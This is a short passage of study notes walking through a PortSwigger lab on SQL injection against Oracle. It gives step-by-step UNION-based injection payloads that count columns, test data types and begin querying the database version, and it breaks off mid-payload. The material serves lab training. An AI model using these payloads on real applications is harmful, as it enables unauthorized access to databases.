3. SQL Injection - Examining the Database - Versions
Examining the type of database and its details like version, how many tables and what the table holds is useful. Cheat Sheet SQL Injection https://portswigger.net/web-security/sql-injection/cheat-sheet Do SQL Injection to retrieve the database version. (ORACLE) Lab-07 - SQL injection attack, querying the database type and version on Oracle (1) Determine the number of columns ' order by 3 -- -> internal server error 3 - 1 = 2 (2) Determine the data types of the columns ' UNION SELECT 'a', 'a' from DUAL-- -> Oracle database (3) Output the version of the database ' UNION SELECT